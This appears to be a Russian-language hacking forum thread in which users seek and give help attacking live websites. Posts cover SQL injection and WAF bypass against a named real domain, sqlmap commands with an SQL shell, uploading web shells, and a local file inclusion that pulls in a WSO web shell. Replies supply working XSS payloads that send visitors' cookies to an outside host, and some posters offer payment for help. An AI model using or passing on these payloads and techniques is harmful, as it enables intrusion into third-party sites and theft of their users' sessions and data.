Скорее всего файл физически не льется на сервер, в списке он появляется, потому что скрипт загрузки и скрипт добавления в список не взаимодействуют друг с другом
Error-Based SQL Injection . WAF фильтрует concat . *****.**/news.php?id=1 concat <---- пробовал так и выдаёт 403 . В общем блокает конкретно,как обойти или чем заменить ? ------ Через Havij крутанул сайт . Поначалу в логах 404 выдавал,а потом через blind крутанул. Начал брутить таблицы из 731 вариантов ни один не подошёл.Пошёл в SQLMap он сразу 404 пишет.Я не знаю как попросить скулмап это заигнорить,ибо никакой ошибки то и нет . И я не ошибаюсь там реально скуля есть,ибо Havij всю инфу выдал кроме таблиц . Current-user,sql version и.т.д всё это есть .
делаю выборку юзера из таблицы, получаю: Code: [14:42:33] [WARNING] the SQL query provided does not return any output [14:42:33] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind [14:42:33] [INFO] retrieved: [14:42:35] [WARNING] the SQL query provided does not return any output как быть? Code: ./sqlmap.py -u https://site.ru --data="vuln=dd" -p vuln --cookie "cookie" --dbs --random-agent --sql-shell --threads 10 --no-cast
Залить шелл в таких условиях? Code: $uploaddir = "img/news/"; $temp=sha1(uniqid()).".jpg"; $uploadfile = $uploaddir . $temp; move_uploaded_file($_FILES['image']['tmp_name'], $uploadfile);
есть урл, october cms - https://site.ru/blog/post/name_post там есть скуля, хочу раскрутить через sqlmap, но чистого роута не знаю, есть спецы по octobercms? нужно знать урл по типу такого https://site.ru/blog.php?post=name_post
и еще один вопрос, есть lfi: Code: Warning: file_exists() expects parameter 1 to be a valid path, string given in /var/www/***/***/***.php on line 3170 Не найден файл: site_func/https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php судя из ошибка пыхи (а пыху знаю 6 лет), в file_exists нельзя пихать строку, требуется файл на сервере, как реализовать? Еще поправка, файлы онли .php подключает. UPD: Кстате любой файл исполняется, а не экранируется, конфиги не получить, cms знаю, пути знаю, как извлечь инфу нужную? Кто поможет раскрутить lfi (url не дам, только варианты пробовать буду), отбрагодарю финансово. В ЛС могу кинуть уязвимый код на пыхе
Где тут вектор атаки что я делаю нетак http://iucosoft.com/software-development-details.html?place=-desktop'+or+union+select+1,2,3+or+''='8
XSS. Задача обойти фильтр. Пропускает исключительно <img> 10$ в BTC за результативную помощь в внедрении кода (ЛС). Сайт №1. Отправляю: Code: <img src="/" onerror="javascript:img = new Image(); img.src = "https://domen.com/1.gif?"+document.cookie;"></img> Получаю: Code: <img src="/" onerror="javascript:img = new Image(); img.src = " https:="" domen.com="" 1.gif?"="" document.cookie;"=""> Сайт №2 Отправляю: Code: <img onload="var s = document.createElement('script'); s.src='https://domen.com/1'; /> Получаю Code: <img src="https://domen.com/1">
Синтаксис нарушен img.src = 'https://domen.com/1.gif?', возможно из-за этого парсер ломает структуру. javascript: там не нужен. Code: <img src=x onerror="var i = document.createElement('img');i.src = 'https://domen.com/1.gif?'+document.cookie;"></img> Во втором похоже на белый список атриббутов, фильтр вроде caja.
1: Code: <img src="/" onerror="new Image().src='http://domain/1.gif?'+document.cookie"></img> со вторым не факт, что получится, он вырезает лишние параметры из тега
Нашел инклюдовскую уяз.,почитал о ней,попытался залить шелл,но не получается. Может кто-нибудь поможет? Code: Warning: include(mod/mtood"/index.php) [function.include]: failed to open stream: No such file or directory in /var/www/[site]/data/www/[site]/template/index.html on line 74 Warning: include(mod/mtood"/index.php) [function.include]: failed to open stream: No such file or directory in /var/www/[site]/data/www/[site]/template/index.html on line 74 Warning: include() [function.include]: Failed opening 'mod/mtood"/index.php' for inclusion (include_path='.:/opt/php5.3-mod/lib/php') in /var/www/[site]/data/www/[site]/template/index.html on line 74 (Сайт могу скинуть в лс) И еще вопрос,можно ли шелл не держать у себя на сайте?Залить его к примеру на файлообменник...
ты смешиваешь в одну кучу 2 разных вектора,ломая при этом весь синтаксис и логику Code: http://iucosoft.com/software-development-details.html?place=-desktop'+or+substring(version(),1,1)='5
таргет: https://site.ru/check.php?notif_read=-1' выводит на белом фоне - "sql exception" и все, как крутить можно?